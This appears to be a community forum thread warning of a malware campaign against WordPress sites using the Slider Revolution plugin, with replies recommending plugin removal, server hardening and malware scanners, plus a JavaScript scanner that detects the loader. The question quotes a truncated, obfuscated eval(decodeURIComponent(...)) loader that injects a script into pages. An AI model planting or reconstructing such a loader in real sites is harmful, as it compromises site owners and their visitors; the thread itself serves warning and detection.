Question

WordPress Malware...check your sites!

Looks like another WordPress exploit: Some 100,000 or more WordPress sites infected by mysterious malware

Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this:

“The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:”

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin.
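The manual check described in the question, reading page source for the `eval(decodeURIComponent(...))` loader, can be scripted. This is an added example and not part of the original post; `scanHtml`, `tolerantDecode` and the sample pages are hypothetical names and constructed input, and the payload is only decoded as text, never executed.

```javascript
// Added example (not from the original post). Decodes as text only; nothing is eval'd.
// Matches eval(decodeURIComponent("...")) even when split across lines, as in the post.
const LOADER_RE = /eval\s*\(\s*decodeURIComponent\s*\(\s*(["'])([^"']*)\1\s*\)\s*\)/g;

// Decode each well-formed %XX byte and leave everything else untouched, so a
// truncated or elided string does not throw the URIError decodeURIComponent would.
// Bytes are mapped one-to-one to characters, which is enough for ASCII payloads.
function tolerantDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Return one finding per loader found in the page source.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(LOADER_RE)) {
    const encoded = m[2];
    const triplets = (encoded.match(/%[0-9A-Fa-f]{2}/g) || []).length;
    const decoded = tolerantDecode(encoded);
    findings.push({
      offset: m.index,
      // Share of the argument that is %XX; near 1.0 means even plain letters were encoded.
      encodedRatio: encoded.length ? (triplets * 3) / encoded.length : 0,
      injectsScript: /createElement|appendChild|document\.write/.test(decoded),
      decoded,
    });
  }
  return findings;
}

// Constructed sample input: a harmless payload encoded the same way.
const encodeAll = (s) => Array.from(s, (c) =>
  "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
const SAMPLE_PAYLOAD = "(function(){var marker='constructed_sample';head.appendChild(marker);}());";
const INFECTED_SAMPLE = "<html><head><script>eval(decodeURIComponent\n(\"" +
  encodeAll(SAMPLE_PAYLOAD) + "\"));</script></head></html>";
const CLEAN_SAMPLE = "<script>var q = decodeURIComponent(location.search);</script>";

for (const f of scanHtml(INFECTED_SAMPLE)) {
  console.log(`offset ${f.offset} ratio ${f.encodedRatio.toFixed(2)} injectsScript=${f.injectsScript}`);
  console.log(f.decoded);
}
```

Ordinary uses of `decodeURIComponent`, such as the one in `CLEAN_SAMPLE`, are not flagged because the pattern requires the surrounding `eval(...)` and a string literal argument.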



Hello there,

The revolution slider is known for having security vulnerabilities and I’ll recommend using another gallery plugin for your WordPress site.

It is essential to secure your droplet; however, running malware software is not definitely a must, but it is still a good thing to do.

I’ll highly recommend checking our tutorial An Introduction to Securing your Linux VPS:

https://www.digitalocean.com/community/tutorials/an-introduction-to-securing-your-linux-vps

I can recommend using software like Linux Malware Detect which is a malware scanner for Linux.

Hope that this helps!

To check, use websites like https://www.virustotal.com/ as a URL scanner!!

Thank you so much for posting this, my entire site got its poo pushed in.

Thank god I used a backup plugin.

The attack blocked me out of my admin panel, corrupted the entire website - I’m still learning on WordPress stuff, so I would’ve lost 5 months without a backup plugin.

Thanks for posting this, I’ve disabled the slide plugin right away.